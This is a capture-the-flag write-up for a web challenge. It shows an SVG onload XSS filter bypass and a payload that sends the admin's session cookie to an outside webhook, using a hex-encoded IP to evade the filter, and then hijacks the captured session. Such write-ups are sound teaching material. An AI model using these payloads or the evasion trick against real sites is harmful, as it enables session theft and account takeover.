Tags: cookie xss 

Rating: 5.0

This is an XSS challenge. Sign up and try to send yourself an XSS message:


There is a filter in place, so let's get around it. Let's try this payload: `<svg onload=alert("xss")//`
<p align="center">

Sweet, let's read our messages to see if we successfully XSS ourselves:

Success!

Now we need to craft a payload that steals the admin user session cookie and bypass the filters in place. To receive back a request, I used https://webhook.site/ and received the following unique URL: `http://webhook.site/6db432a0-7984-4146-9fbc-d6278b9f865f`. There is a single period in the address. To get around this, I `ping webhook.site` to get the ip address (46.4.105.116). From here, we can [convert that ip address to hex](https://onlinehextools.com/convert-ip-to-hex), and we get `(0x2e046974)`. If you try going to http://0x2e046974, it will properly resolve to the correct ip address and hostname, which is neat. Our unique URL is now: http://0x2e046974/6db432a0-7984-4146-9fbc-d6278b9f865f.

Here is the XSS payload: `<svg onload=document['location']="http://0x2e046974/6db432a0-7984-4146-9fbc-d6278b9f865f/?c="+document['cookie']//`

Let's send it to the admin:
<p align="center">

Let's check our webhook:

Sweet! We got a session cookie:
`.eJwlzj0OwjAMQOG7ZGaInSaxe5nKvwKJqRET4u4UMb7pfe9y5BnrXvaU54pbOR5e9pIYBGOKVgo3wEmOtnUYDORs0TjRRaJnnyQtBrK4WVpvigltxIyxTQ6pfWMFSZ6eQL9Az6lIlbmrXZcW2kkHeMYwwlDFWi7Ia8X510D5fAFFYzCb.YiWMRg.092EULk8J3n8Q__eqbmFDDocCbY`

Let's set this as our session cookie value:

Reload the page, and voilĂ !

Click into `admin panel` and we have the flag!

Original writeup (https://github.com/NihilistPenguin/PatriotCTF2022-Writeups/blob/main/Web/ChewyOrCrunchy.md).